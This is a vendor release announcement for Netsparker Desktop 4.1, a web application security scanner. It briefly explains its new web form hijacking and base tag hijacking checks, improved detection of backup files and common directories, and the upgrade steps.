Netsparker 4.1 Release – New Security Checks and Improvements

In this new version of Netsparker Desktop there are two new security checks for web forms and base tag hijacking, and we also have a good number of improvements and bug fixes. Read this blog post for more information of what is new and improved in the only false positive free web application security scanner.

Today we are announcing the release of Netsparker Desktop 4.1. This new version includes a number of new web application security checks and improvements, as explained below.

Web Form Hijacking Security Check

Web form hijacking is the exploitation of a vulnerable form that allows the attacker to steal the content of a form. For a successful attack the attacker leads the victim to access and populate the form using a specially crafted URL that exploits the vulnerability. Once exploited the form POST data will go to the attacker's controlled server, thus allowing him to access such data.

Base Tag Hijacking Web Security Check

When a web application is vulnerable to base tag hijacking attackers are able to control the href attribute of a base tag in HTML. This means that the attackers can load images, JavaScripts and other types of scripts from a domain they control and have them executed on the context of the page. This vulnerability's impact is almost the same as that of a cross-site scripting vulnerability.

Other Major Improvements

Detection of Backup Files on Websites

In this version we also improved the scanner's detection of backup files on websites. As such backup files do not have a direct impact on the security of a website, as in they are not like a SQL Injection vulnerability that if exploited it allows the attacker to access the backend database. Though if discovered, some of them might have some information that can help attackers better craft their attack. So it is all good to know about them as well.

Configuration of Backup Files Signatures

We also moved the Backup Files signatures in the Scan Policy Editor, thus allowing users to modify the list of signatures and easily add their own signatures as well as shown in the below screenshot.

Configuring backup files security check using the Netsparker Scan Policy Editor

Detection of Common Directories on Websites

Similar to backup files, common directories do not have a direct impact on the security of a website though they can definitely ease an attacker's job. For example an attacker would give more attention to a directory called /admin/ rather than a directory called /samples/.

Netsparker 4.1 ChangeLog

The above are just the major highlights for this version of Netsparker. For a complete list of all that has been improved and fixed refer to the Netsparker Desktop changelog.

Upgrading Netsparker Web Application Security Scanner

If you are already using Netsparker Web Application Security Scanner, a pop up window with the upgrade details will pop up the next time you run Netsparker. Alternatively you can always click Check for Updates from the Help drop down menu to force manual updates.

If you have problems with the upgrade or product related queries, get in touch with our awesome support team by sending us an email on support@invicti.com.